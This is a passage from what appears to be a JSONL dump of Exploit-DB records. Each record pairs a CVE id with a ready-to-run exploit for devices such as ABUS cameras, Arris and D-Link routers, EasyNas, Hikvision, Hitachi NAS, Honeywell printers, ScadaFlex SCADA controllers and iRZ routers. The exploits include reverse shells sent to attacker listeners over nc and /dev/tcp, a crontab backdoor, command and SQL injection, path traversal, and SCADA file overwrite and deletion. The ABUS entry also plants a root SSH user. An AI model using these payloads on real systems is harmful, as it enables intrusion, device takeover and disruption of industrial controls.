passwd file. When reading the configuration of\nthe BOA server (/etc/boa.conf), we find hardcoded credentials:\n\n# MFT: Specify manufacture commands user name and password\nMFT manufacture erutcafunam\n\nThese can now be used to execute the RCE (based on command injection):\n\n#!/bin/bash\n#\n# ABUS Security Camera RCE\n#\ncurl -iv \"http://manufacture:erutcafunam@a.b.c.d/cgi-bin/mft/wireless_mft?ap=testname;$1\"\n\nand can be called like:\n\n./LFI.sh id\n\nto display a user id of\n\nuid=0(root) gid=0(root)\n\n\n+++++++++++++++++++++++++++++++\n0x03\tSSH Remote Root Access\n+++++++++++++++++++++++++++++++\n\nAfter having discovered the previously described vulnerabilities, multiple\nattempts to spawn a nice reverse shell failed as the system was minimal\nand did neither offer binaries like bash or netcat, nor any compilers or\nscripting language interpreters to execute our code. Furthermore, binaries\nthat we transferred onto the system (for ARM little-endian architecture)\neither resulted in \"Segmentation fault\" (mfsvenom) or as we saw later\n\"Illegal instruction\" (netcat for ARM).\n\nWe had to inspect the local attack surface and use the LOLBIN approach,\na.k.a. living off the land binaries available on the system.\n\nIn this case, the minimal and often busybox-included dropbear SSH daemon\nbecame pretty handy.\n\n\nTo successfully implement a remote root SSH shell for persistance, several\nsteps had to be undertaken:\n\n\n1) First, we had to create a valid SSH keyset by reusing our RCE.sh skript:\n\n./RCE.sh \"/etc/dropbear/dropbearkey%20-t%20rsa%20-f%20/etc/dropbear/dropbear_rsa_host_key\"\n\n\n2) Then, add our user to the password file, e.g.:\n\n./RCE.sh \"echo%20d1g:OmE2EUpLJafIk:0:0:root:/:/bin/sh%20>>%20/etc/passwd\"\n\n\n3) Finally, start the server:\n\n./RCE.sh \"/etc/dropbear/dropbear%20-E%20-F\"\n\n\nWe can now SSH (using obsolete and insecure algorithms for both KeyExchange and HostKey)\ninto our rootshell:\n\nsshpass -p XXXXXXX ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa d1g@x.x.x.x\n\nWelcome to\n\n _____ __ ___ __ ___ _ _ _\n | ___| / \\ / __ \\ / \\ | _ \\ / \\ \\ \\ / /\n | |___ / /\\ \\ | /__\\ \\ / /\\ \\ | | \\ | / /\\ \\ \\ V /\n | ___|| |__| | | _ / | |__| | | | | | | |__| | \\ /\n | | | __ | | | \\ \\ | __ | | |_/ / | __ | | |\n |_| |_| |_| |_| \\_\\|_| |_| |___ / |_| |_| |_|\n\nFor further information check:\nhttp://www.GM.com/\n\nBusyBox v1.1.3 (2012.07.16-03:58+0000) Built-in shell (ash)\nEnter 'help' for a list of built-in commands.\n\n[d1g]# id\nuid=0(root) gid=0(root)\n\n\n---\n\n#EOF", "cve_id": "CVE-2023-26609", "source": "exploitdb", "timestamp": "2023-04-06T00:00:00+00:00"} {"id": "ac3475b6022916553f32", "text": "Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)\n\n# Exploit Title: Arris Router Firmware 9.1.103 - Remote Code Execution (RCE) (Authenticated)\n# Date: 17/11/2022\n# Exploit Author: Yerodin Richards\n# Vendor Homepage: https://www.commscope.com/\n# Version: 9.1.103\n# Tested on: TG2482A, TG2492, SBG10\n# CVE : CVE-2022-45701\n\nimport requests\nimport base64\n\nrouter_host = \"http://192.168.0.1\"\nusername = \"admin\"\npassword = \"password\"\n\nlhost = \"192.168.0.6\"\nlport = 80\n\n\ndef main():\n print(\"Authorizing...\")\n cookie = get_cookie(gen_header(username, password))\n if cookie == '':\n print(\"Failed to authorize\")\n exit(-1)\n print(\"Generating Payload...\")\n payload = gen_payload(lhost, lport)\n print(\"Sending Payload...\")\n send_payload(payload, cookie)\n print(\"Done, check shell..\")\n\ndef gen_header(u, p):\n return base64.b64encode(f\"{u}:{p}\".encode(\"ascii\")).decode(\"ascii\")\n\ndef no_encode_params(params):\n return \"&\".join(\"%s=%s\" % (k,v) for k,v in params.items())\n\ndef get_cookie(header):\n url = router_host+\"/login\"\n params = no_encode_params({\"arg\":header, \"_n\":1})\n resp=requests.get(url, params=params)\n return resp.content.decode('UTF-8')\n\ndef set_oid(oid, cookie):\n url = router_host+\"/snmpSet\"\n params = no_encode_params({\"oid\":oid, \"_n\":1})\n cookies = {\"credential\":cookie}\n requests.get(url, params=params, cookies=cookies)\n\ndef gen_payload(h, p):\n return f\"$\\(nc%20{h}%20{p}%20-e%20/bin/sh)\"\n\ndef send_payload(payload, cookie):\n set_oid(\"1.3.6.1.4.1.4115.1.20.1.1.7.1.0=16;2;\", cookie)\n set_oid(f\"1.3.6.1.4.1.4115.1.20.1.1.7.2.0={payload};4;\", cookie)\n set_oid(\"1.3.6.1.4.1.4115.1.20.1.1.7.3.0=1;66;\", cookie)\n set_oid(\"1.3.6.1.4.1.4115.1.20.1.1.7.4.0=64;66;\", cookie)\n set_oid(\"1.3.6.1.4.1.4115.1.20.1.1.7.5.0=101;66;\", cookie)\n set_oid(\"1.3.6.1.4.1.4115.1.20.1.1.7.9.0=1;2;\", cookie)\n\n\nif __name__ == '__main__':\n main()", "cve_id": "CVE-2022-45701", "source": "exploitdb", "timestamp": "2023-04-06T00:00:00+00:00"} {"id": "645fb119c4fde555a868", "text": "AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal\n\nExploit Title: AVEVA InTouch Access Anywhere Secure Gateway 2020 R2 - Path Traversal\nExploit Author: Jens Regel (CRISEC IT-Security)\nDate: 11/11/2022\nCVE: CVE-2022-23854\nVersion: Access Anywhere Secure Gateway versions 2020 R2 and older\n\nProof of Concept:\nGET\n/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini\nHTTP/1.1\n\nHTTP/1.1 200 OK\nServer: EricomSecureGateway/8.4.0.26844.*\n(..)\n\n; for 16-bit app support\n[fonts]\n[extensions]\n[mci extensions]\n[files]\n[Mail]\nMAPI=1", "cve_id": "CVE-2022-23854", "source": "exploitdb", "timestamp": "2022-11-11T00:00:00+00:00"} {"id": "24c38e2a5f6d7ca021b3", "text": "D-Link DIR-846 - Remote Command Execution (RCE) vulnerability\n\n# Exploit Title: D-Link DIR-846 - Remote Command Execution (RCE) vulnerability\n# Google Dork: NA\n# Date: 30/01/2023\n# Exploit Author: Françoa Taffarel\n# Vendor Homepage:\nhttps://www.dlink.com.br/produto/roteador-dir-846-gigabit-wi-fi-ac1200/#suportehttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip\n# Software Link:\nhttps://www.dlink.com.br/wp-content/uploads/2020/02/DIR846enFW100A53DBR-Retail.zip\n# Version: DIR846enFW100A53DBR-Retail\n# Tested on: D-LINK DIR-846\n# CVE : CVE-2022-46552\n\nD-Link DIR-846 Firmware FW100A53DBR was discovered to contain a remote\ncommand execution (RCE) vulnerability via the lan(0)_dhcps_staticlist\nparameter. This vulnerability is exploited via a crafted POST request.\n\n### Malicious POST Request\n```\nPOST /HNAP1/ HTTP/1.1\nHost: 192.168.0.1\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101\nFirefox/107.0\nAccept: application/json\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/json\nSOAPACTION: \"http://purenetworks.com/HNAP1/SetIpMacBindSettings\"\nHNAP_AUTH: 0107E0F97B1ED75C649A875212467F1E 1669853009285\nContent-Length: 171\nOrigin: http://192.168.0.1\nConnection: close\nReferer: http://192.168.0.1/AdvMacBindIp.html?t=1669852917775\nCookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=idh0QaG7;\nPrivateKey=DBA9B02F550ECD20E7D754A131BE13DF; timeout=4\n\n{\"SetIpMacBindSettings\":{\"lan_unit\":\"0\",\"lan(0)_dhcps_staticlist\":\"1,$(id>rce_confirmed),02:42:d6:f9:dc:4e,192.168.0.15\"}}\n```\n\n\n### Response\n\n```\nHTTP/1.1 200 OK\nX-Powered-By: PHP/7.1.9\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\nCache-Control: no-store, no-cache, must-revalidate\nPragma: no-cache\nContent-type: text/html; charset=UTF-8\nConnection: close\nDate: Thu, 01 Dec 2022 11:03:54 GMT\nServer: lighttpd/1.4.35\nContent-Length: 68\n\n{\"SetIpMacBindSettingsResponse\":{\"SetIpMacBindSettingsResult\":\"OK\"}}\n```\n\n\n### Data from RCE Request\n\n```\nGET /HNAP1/rce_confirmed HTTP/1.1\nHost: 192.168.0.1\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:107.0) Gecko/20100101\nFirefox/107.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nConnection: close\nCookie: PHPSESSID=133b3942febf51641c4bf0d81548ac78; uid=ljZlHjKV;\nPrivateKey=846232FD25AA8BEC8550EF6466B168D9; timeout=1\nUpgrade-Insecure-Requests: 1\n```\n\n\n### Response\n\n```\nHTTP/1.1 200 OK\nContent-Type: application/octet-stream\nAccept-Ranges: bytes\nContent-Length: 24\nConnection: close\nDate: Thu, 01 Dec 2022 23:24:28 GMT\nServer: lighttpd/1.4.35\n\nuid=0(root) gid=0(root)\n```", "cve_id": "CVE-2022-46552", "source": "exploitdb", "timestamp": "2023-04-05T00:00:00+00:00"} {"id": "355f16dcc13605b94ae7", "text": "EasyNas 1.1.0 - OS Command Injection\n\n# Exploit Title: EasyNas 1.1.0 - OS Command Injection\n# Date: 2023-02-9\n# Exploit Author: Ivan Spiridonov (ivanspiridonov@gmail.com)\n# Author Blog: https://xbz0n.medium.com\n# Version: 1.0.0\n# Vendor home page : https://www.easynas.org\n# Authentication Required: Yes\n# CVE : CVE-2023-0830\n\n#!/usr/bin/python3\n\nimport requests\nimport sys\nimport base64\nimport urllib.parse\nimport time\n\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\n# Disable the insecure request warning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nif len(sys.argv) < 6:\n print(\"Usage: ./exploit.py http(s)://url username password listenerIP listenerPort\")\n sys.exit()\n\nurl = sys.argv[1]\nuser = sys.argv[2]\npassword = sys.argv[3]\n\n# Create the payload\npayload = \"/bin/sh -i >& /dev/tcp/{}/{} 0>&1\".format(sys.argv[4], sys.argv[5])\n\n# Encode the payload in base64\npayload = base64.b64encode(payload.encode()).decode()\n\n# URL encode the payload\npayload = urllib.parse.quote(payload)\n\n# Create the login data\nlogin_data = {\n 'usr':user,\n 'pwd':password,\n 'action':'login'\n}\n\n# Create a session\nsession = requests.Session()\n\n# Send the login request\nprint(\"Sending login request...\")\nlogin_response = session.post(f\"https://{url}/easynas/login.pl\", data=login_data, verify=False)\n\n# Check if the login was successful\nif 'Login to EasyNAS' in login_response.text:\n print(\"Unsuccessful login\")\n sys.exit()\nelse:\n print(\"Login successful\")\n\n\n# send the exploit request\ntimeout = 3\n\ntry:\n exploit_response = session.get(f'https://{url}/easynas/backup.pl?action=backup&menu=none&.submit=Backup&name=%7cecho+{payload}+%7c+base64+-d+%7c+sudo+sh+%7c%7ca+%23', headers={'User-Agent':'Mozilla/5.0 Gecko/20100101 Firefox/72.0'}, timeout = timeout, verify=False)\n if exploit_response.status_code != 200:\n print(\"[+] Everything seems ok, check your listener.\")\n else:\n print(\"[-] Exploit failed, system is patched or credentials are wrong.\")\n\nexcept requests.exceptions.ReadTimeout:\n print(\"[-] Everything seems ok, check your listener.\")\n sys.exit()", "cve_id": "CVE-2023-0830", "source": "exploitdb", "timestamp": "2023-04-06T00:00:00+00:00"} {"id": "a543beb97195826a8ce3", "text": "Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution\n\n# Exploit Title: Hikvision Hybrid SAN Ds-a71024 Firmware - Multiple Remote Code Execution\n# Date: 16 July 2023\n# Exploit Author: Thurein Soe\n# CVE : CVE-2022-28171\n# Vendor Homepage: https://www.hikvision.com\n# Software Link: N/A\n# Refence Link: https://cve.report/CVE-2022-28171\n# Version: Filmora 12: Ds-a71024 Firmware, Ds-a71024 Firmware Ds-a71048r-cvs Firmware Ds-a71048 Firmware Ds-a71072r Firmware Ds-a71072r Firmware Ds-a72024 Firmware Ds-a72024 Firmware Ds-a72048r-cvs Firmware Ds-a72072r Firmware Ds-a80316s Firmware Ds-a80624s Firmware Ds-a81016s Firmware Ds-a82024d Firmware Ds-a71048r-cvs Ds-a71024 Ds-a71048 Ds-a71072r Ds-a80624s Ds-a82024d Ds-a80316s Ds-a81016s\n'''\nVendor Description:\n\nHikvision is a world-leading surveillance manufacturer and supplier of\nvideo surveillance and Internet of Things (IoT) equipment for civilian and\nmilitary purposes.\nSome Hikvision Hybrid SAN products were vulnerable to multiple remote code\nexecution vulnerabilities such as command injection, Blind SQL injection,\nHTTP request smuggling, and reflected cross-site scripting.\nThis resulted in remote code execution that allows an adversary to execute\narbitrary operating system commands and more. However, an adversary must be\non the same network to leverage this vulnerability to execute arbitrary\ncommands.\n\nVulnerability description:\nA manual test confirmed that The download type parameter was vulnerable to\nBlind SQL injection.I created a Python script to automate and enumerate SQL\nversions as the Application was behind the firewall and block all the\nrequests from SQLmap.\n\nRequest Body:\nGET\n/web/log/dynamic_log.php?target=makeMaintainLog&downloadtype='(select*from(select(sleep(10)))a)'\nHTTP/1.1\nHost: X.X.X.X.12:2004\nAccept-Encoding: gzip, deflate\nAccept: */*\nAccept-Language: en\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\n(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36\nConnection: close\n\nPOC:\n'''\nimport requests\nimport time\n\nurl = \"http://X.X.X.X:2004/web/log/dynamic_log.php\"\n\n# Function to check if the response time is greater than the specified delay\ndef is_response_time_delayed(response_time, delay):\n return response_time >= delay\n\n# Function to perform blind SQL injection and check the response time\ndef perform_blind_sql_injection(payload):\n proxies = {\n 'http': 'http://localhost:8080',\n 'https': 'http://localhost:8080',\n }\n\n params = {\n 'target': 'makeMaintainLog',\n 'downloadtype': payload\n }\n headers = {\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept': '*/*',\n 'Accept-Language': 'en',\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)\nAppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36',\n 'Connection': 'close'\n }\n\n start_time = time.time()\n response = requests.get(url, headers=headers, params=params,\nproxies=proxies)\n end_time = time.time()\n\n response_time = end_time - start_time\n return is_response_time_delayed(response_time, 20)\n\n# Enumerate the MySQL version\ndef enumerate_mysql_version():\n version_Name = ''\n sleep_time = 10 # Sleep time is 10 seconds\n\n payloads = [\n f\"' AND (SELECT IF(ASCII(SUBSTRING(@@version, {i}, 1))={mid},\nSLEEP({sleep_time}), 0))-- -\"\n for i in range(1, 11)\n for mid in range(256)\n ]\n\n for payload in payloads:\n if perform_blind_sql_injection(payload):\n mid = payload.split(\"=\")[-1].split(\",\")[0]\n version_Name += chr(int(mid))\n\n return version_Name\n\n# Enumeration is completed\nversion_Name = enumerate_mysql_version()\nprint(\"MySQL version is:\", version_Name)", "cve_id": "CVE-2022-28171", "source": "exploitdb", "timestamp": "2023-07-19T00:00:00+00:00"} {"id": "82451765c50fd1a13ad4", "text": "HNAS SMU 14.8.7825 - Information Disclosure\n\n# Exploit Title: Hitachi NAS (HNAS) System Management Unit (SMU) 14.8.7825 - Information Disclosure\n# CVE: CVE-2023-6538\n# Date: 2023-12-13\n# Exploit Author: Arslan Masood (@arszilla)\n# Vendor: https://www.hitachivantara.com/\n# Version: < 14.8.7825.01\n# Tested On: 13.9.7021.04\n\nimport argparse\nfrom os import getcwd\n\nimport requests\n\nparser = argparse.ArgumentParser(\n description=\"CVE-2023-6538 PoC\",\n usage=\"./CVE-2023-6538.py --host --id --sso \"\n )\n\n# Create --host argument:\nparser.add_argument(\n \"--host\",\n required=True,\n type=str,\n help=\"Hostname/FQDN/IP Address. Provide the port, if necessary, i.e. 127.0.0.1:8443, example.com:8443\"\n )\n\n# Create --id argument:\nparser.add_argument(\n \"--id\",\n required=True,\n type=str,\n help=\"JSESSIONID cookie value\"\n )\n\n# Create --sso argument:\nparser.add_argument(\n \"--sso\",\n required=True,\n type=str,\n help=\"JSESSIONIDSSO cookie value\"\n )\n\n# Create --id argument:\nparser.add_argument(\n \"--id\",\n required=True,\n type=str,\n help=\"Server ID value\"\n )\n\nargs = parser.parse_args()\n\ndef download_file(hostname, jsessionid, jsessionidsso, serverid):\n # Set the filename:\n filename = \"registry_data.tgz\"\n\n # Vulnerable SMU URL:\n smu_url = f\"https://{hostname}/mgr/app/template/simple%2CDownloadConfigScreen.vm?serverid={serverid}\"\n\n # GET request cookies\n smu_cookies = {\n \"JSESSIONID\": jsessionid,\n \"JSESSIONIDSSO\": jsessionidsso\n }\n\n # GET request headers:\n smu_headers = {\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\",\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8\",\n \"Accept-Language\": \"en-US,en;q=0.5\",\n \"Accept-Encoding\": \"gzip, deflate\",\n \"Dnt\": \"1\",\n \"Referer\": f\"https://{hostname}/mgr/app/action/serveradmin.ConfigRestoreAction/eventsubmit_doperform/ignored\",\n \"Upgrade-Insecure-Requests\": \"1\",\n \"Sec-Fetch-Dest\": \"document\",\n \"Sec-Fetch-Mode\": \"navigate\",\n \"Sec-Fetch-Site\": \"same-origin\",\n \"Sec-Fetch-User\": \"?1\",\n \"Te\": \"trailers\",\n \"Connection\": \"close\"\n }\n\n # Send the request:\n with requests.get(smu_url, headers=smu_headers, cookies=smu_cookies, stream=True, verify=False) as file_download:\n with open(filename, 'wb') as backup_archive:\n # Write the zip file to the CWD:\n backup_archive.write(file_download.content)\n\n print(f\"{filename} has been downloaded to {getcwd()}\")\n\nif __name__ == \"__main__\":\n download_file(args.host, args.id, args.sso, args.id)", "cve_id": "CVE-2023-6538", "source": "exploitdb", "timestamp": "2024-03-20T00:00:00+00:00"} {"id": "2be0310990a02dff0123", "text": "Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)\n\n#- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)\n#- Shodan Dork: http.title:PM43 , PM43\n#- Exploit Author: ByteHunter\n#- Email: 0xByteHunter@proton.me\n#- Frimware Version: versions prior to P10.19.050004\n#- Tested on: P10.17.019667\n#- CVE : CVE-2023-3710\n\n\nimport requests\nimport argparse\n\nBLUE = '\\033[94m'\nYELLOW = '\\033[93m'\nRESET = '\\033[0m'\n\ndef banner():\n banner = \"\"\"\n ╔════════════════════════════════════════════════╗\n CVE-2023-3710\n Command Injection in Honeywell PM43 Printers\n Author: ByteHunter\n ╚════════════════════════════════════════════════╝\n \"\"\"\n print(YELLOW + banner + RESET)\n\n\ndef run_command(url, command):\n full_url = f\"{url}/loadfile.lp?pageid=Configure\"\n payload = {\n 'username': f'hunt\\n{command}\\n',\n 'userpassword': 'admin12345admin!!'\n }\n try:\n response = requests.post(full_url, data=payload, verify=False)\n response_text = response.text\n html_start_index = response_text.find('')\n if html_start_index != -1:\n return response_text[:html_start_index]\n else:\n return response_text\n except requests.exceptions.RequestException as e:\n return f\"Error: {e}\"\n\ndef main():\n parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')\n parser.add_argument('--url', dest='url', help='Target URL', required=True)\n parser.add_argument('--run', dest='command', help='Command to execute', required=True)\n\n args = parser.parse_args()\n\n response = run_command(args.url, args.command)\n print(f\"{BLUE}{response}{RESET}\")\n\nif __name__ == \"__main__\":\n banner()\n main()", "cve_id": "CVE-2023-3710", "source": "exploitdb", "timestamp": "2024-03-14T00:00:00+00:00"} {"id": "7e149d491307495e769b", "text": "ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 - Remote File CRUD\n\n# Exploit Title: CL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD\n# Exploit Author: LiquidWorm\n\n#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n#\n# ICL ScadaFlex II SCADA Controllers SC-1/SC-2 1.03.07 Remote File CRUD\n#\n#\n# Vendor: Industrial Control Links, Inc.\n# Product web page: http://www.iclinks.com\n# Product datasheet: http://files.iclinks.com/datasheets/Scadaflex%20II/Scadaflex%20SC-1%20&%20SC-2_A1_compressed.pdf\n# Affected version: SW: 1.03.07 (build 317), WebLib: 1.24\n# SW: 1.02.20 (build 286), WebLib: 1.24\n# SW: 1.02.15 (build 286), WebLib: 1.22\n# SW: 1.02.01 (build 229), WebLib: 1.16\n# SW: 1.01.14 (build 172), WebLib: 1.14\n# SW: 1.01.01 (build 2149), WebLib: 1.13\n#\n#\n# Summary: Scadaflex II controllers are 100% web based\n# for both configuration and user interface. No applications\n# are required other than any standard web browser. They\n# are easily supported by remote access over the Internet\n# or a cellular link. Scadaflex II controllers support\n# industry standard wired communications using Modbus,\n# DF1, SNP, and Ethernet IP protocols along with Ethernet-Serial\n# bridging for Modbus or any other protocol. Each Scadaflex\n# II controller has both analog and digital, inputs and\n# outputs, sufficient for pumping stations, irrigation\n# controls, and other similar process monitoring and control\n# applications. They can also serve as communications\n# concentrators and protocol converters that enhance the\n# operation of existing PLCs and process equipment.\n#\n# Desc: The SCADA controller is vulnerable to unauthenticated\n# file write/overwrite and delete vulnerability. This allows\n# an attacker to execute critical file CRUD operations on the\n# device that can potentially allow system access and impact\n# availability.\n#\n# Tested on: SCADA HTTP Server\n#\n#\n# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\n# @zeroscience\n#\n#\n# Advisory ID: ZSL-2022-5698\n# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5698.php\n#\n# CVE ID: CVE-2022-25359\n# CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-25359\n#\n#\n# 06.11.2021\n#\n\nimport time,sys\nimport requests\nimport datetime\nimport showtime\n\n# Default\n# AES Encryption Key = 'ABCD1234abcd:ICL'\n\ndef bann():\n print('''\n----------------------------------------------------------\n ) ) ) ) ) )\n ( ( ( ( ( (\n ) ) ) ) ) )\n (~~~~~~~~~) (~~~~~~~~~)\n | t00t | | w00t |\n | | | |\n I _._ I _._\n I /' `\\\\ I /' `\\\\\n I | M | I | J |\n f | |~~~~~~~~~~~~~~| f | |~~~~~~~~~~~~~~|\n .' | ||~~~~~~~~| | .' | | |~~~~~~~~| |\n/'______|___||__###___|____|/'_______|____|_|__###___|___|\n\n ScadaFlex II SCADA Controllers\n Remote write/delete PoC\n ZSL-2022-5698\n----------------------------------------------------------\n ''')\n\ndef safe(*trigger, ):\n return True # |-| Safety Switch\n\ndef choice(n):\n try:\n if n == 1:\n overwrite(controllerip = sys.argv[1], filepos = int(sys.argv[3], base = 10))\n elif n == 2:\n delete(controllerip = sys.argv[1], filepos = int(sys.argv[2], base = 10))\n else:\n print('Usage (Upload): ./sflex.py [IP] [Local file] [File position number]')\n print('Usage (Delete): ./sflex.py [IP] [File position number]')\n raise SystemExit('t00t')\n except Exception as tip:\n raise SystemExit(tip)\n\ndef jump():\n choice(1) if len(sys.argv) == 4 else next\n choice(2) if len(sys.argv) == 3 else next\n\ndef overwrite(controllerip, filepos):\n print('Starting script at', start)\n localfile = sys.argv[2]\n\n with open(localfile, 'rb') as opener:\n scadaurl = 'http://'\n scadaurl += controllerip\n scadaurl += '/d.php?N'\n scadaurl += str(filepos)\n scadaurl += ',73,'\n scadaurl += opener.name\n scadaurl += '~'\n scadaurl += str(int(time.time()))\n\n see = requests.post(scadaurl, files = {'upload' : opener})\n\n if '100' in see.text:\n print('File uploaded in {} directory at position {}.'.format('l', filepos))\n print('URL: http://' +controllerip+ '/l/' +localfile)\n else:\n print(\"- controller webserver error.\")\n exit()\n\ndef delete(controllerip, filepos):\n print('Starting script at', start)\n exit(42) if isinstance(filepos, str) else next\n\n scadaurl = 'http://'\n scadaurl += controllerip\n scadaurl += '/rW12IcL_Dat_N'\n scadaurl += str(filepos)\n scadaurl += ',0=1~'\n scadaurl += str(int(time.time()))\n\n see = requests.ge", "cve_id": "CVE-2022-25359", "source": "exploitdb", "timestamp": "2022-02-23T00:00:00+00:00"} {"id": "2540d188903623eb1eb2", "text": "iRZ Mobile Router - CSRF to RCE\n\n# Exploit Title: iRZ Mobile Router - CSRF to RCE\n# Google Dork: intitle:\"iRZ Mobile Router\"\n# Date: 2022-03-18\n# Exploit Author: Stephen Chavez & Robert Willis\n# Vendor Homepage: https://en.irz.ru/\n# Software Link: https://github.com/SakuraSamuraii/ez-iRZ\n# Version: Routers through 2022-03-16\n# Tested on: RU21, RU21w, RL21, RU41, RL01\n# CVE : CVE-2022-27226\n\nimport os\nimport requests\nimport json\nimport subprocess\n\noption = \"0\"\n\n\ndef main():\n print(\"####################################################\")\n print(\"# Welcome to IRZ CSRF to RCE Exploit - version 1.0 #\")\n print(\"####################################################\")\n print()\n print(\"## by RedragonX of WHG & rej_ex of SAKURA SAMURAI ##\")\n print()\n print(\"1. Post Authentication RCE (Needs Credentials)\")\n print(\"2. CSRF to RCE (No Credentials)\")\n print()\n runit()\n\n\ndef runit():\n option = input(\"Select an option: \")\n if option == \"1\":\n exploit1()\n elif option == \"2\":\n exploit2()\n else:\n print(\"You must select '1' or '2'. Exiting.\")\n\n\ndef exploit1():\n print(\"## Running Post Auth RCE exploit\")\n print()\n print()\n router_ip = input(\"## Enter the router ip to exploit: \")\n router_port = int(\n input(\"## Enter the victim router web page port (default is 80): \") or \"80\")\n\n router_user = input(\"## Enter the username for the router login: \")\n router_pass = input(\"## Enter the password for the router login: \")\n\n LHOST = input(\"## Enter the LHOST for the router reverse shell: \")\n LPORT = input(\"## Enter the LPORT for the router reverse shell: \")\n\n router_url = f'http://{router_ip}:{router_port}'\n\n nc1_str = f'Start a listener with the following command: nc -lvp {LPORT}'\n\n input(nc1_str + \"\\n\\nPress enter once you do\")\n\n send_json_payload(router_url, router_user, router_pass, LHOST, LPORT)\n\n\ndef send_json_payload(router_url, router_user, router_pass, lhost_ip, lhost_port):\n\n intro = f'Sending the payload to {router_url}\\n'\n print(intro)\n payload_str = '{\"tasks\":[{\"enable\":true,\"minutes\":\"*\",\"hours\":\"*\",\"days\":\"*\",\"months\":\"*\",\"weekdays\":\"*\",\"command\":\"rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc ' + \\\n f'{lhost_ip} {lhost_port} ' + \\\n '>/tmp/f\"}],\"_board\":{\"name\":\"RL21\",\"platform\":\"irz_mt02\",\"time\":\"Wed Mar 16 16:43:20 UTC 2022\"}}'\n\n payload_json = json.loads(payload_str)\n\n s = requests.Session()\n\n s.auth = (router_user, router_pass)\n\n s.headers.update(\n {\"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36\"})\n s.headers.update({\"X-Requested-With\": \"XMLHttpRequest\"})\n s.headers.update({\"Origin\": router_url})\n s.headers.update({\"Referer\": router_url})\n\n s.post(router_url + \"/api/crontab\", json=payload_json)\n\n exploit_str = f'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} 443 >/tmp/f'\n\n print(\n \"Request sent! You may have to wait about 2 minutes to get a shell. \\nFirst shell will die due to crontab job. Start a new listener on a new port [e.g. 443], and run the following command: \" + exploit_str)\n print(\"To fix TTY: type telnet 0.0.0.0 in the shell\")\n\n\ndef exploit2():\n\n print(\"## Running CSRF to RCE exploit\")\n print()\n print()\n router_ip = input(\"## Enter the router ip to exploit: \")\n router_port = int(\n input(\"## Enter the victim router web page port (default is 80): \") or \"80\")\n\n LHOST = input(\"## Enter the LHOST for the router reverse shell: \")\n LPORT = input(\"## Enter the LPORT for the router reverse shell: \")\n\n load_csrf_poc_file(router_ip, router_port, LHOST, LPORT)\n\n\ndef load_csrf_poc_file(router_ip, router_port, lhost_ip, lhost_port):\n\n file_path = os.path.dirname(__file__) + os.sep + \"poc.template.html\"\n\n if os.path.isfile(file_path):\n with open(file_path) as poc_file:\n original_poc_data_str = poc_file.read()\n\n new_html = original_poc_data_str.replace(\"{router_ip}\", router_ip)\n new_html = new_html.replace(\n \"{router_port}\", str(router_port))\n\n lhost_split_arr = lhost_ip.split(\".\")\n\n if len(lhost_split_arr) == 4:\n\n new_html = new_html.replace(\n \"{lhost_ip_octect_1}\", lhost_split_arr[0])\n\n new_html = new_html.replace(\n \"{lhost_ip_octect_2}\", lhost_split_arr[1])\n\n new_html = new_html.replace(\n \"{lhost_ip_octect_3}\", lhost_split_arr[2])\n new_html = new_html.replace(\n \"{lhost_ip_octect_4}\", lhost_split_arr[3])\n\n new_html = new_html.replace(\n \"{lhost_port}\", lhost_port)\n\n new_file_path = os.path.dirname(\n __file__) + os.sep + \"poc.new.html\"\n try:\n with open(new_file_path, 'w') as new_file:\n ", "cve_id": "CVE-2022-27226", "source": "exploitdb", "timestamp": "2022-03-22T00:00:00+00:00"} {"id": "002c7ce9abcf1cce0265", "text": "MSNSwitch Firmware MNT.2408 - Remote Code Execution\n\nExploit Title: MSNSwitch Firmware MNT.2408 - Remote Code Exectuion (RCE)\nGoogle Dork: n/a\nDate:9/1/2022\nExploit Author: Eli Fulkerson\nVendor Homepage: https://www.msnswitch.com/\nVersion: MNT.2408\nTested on: MNT.2408 firmware\nCVE: 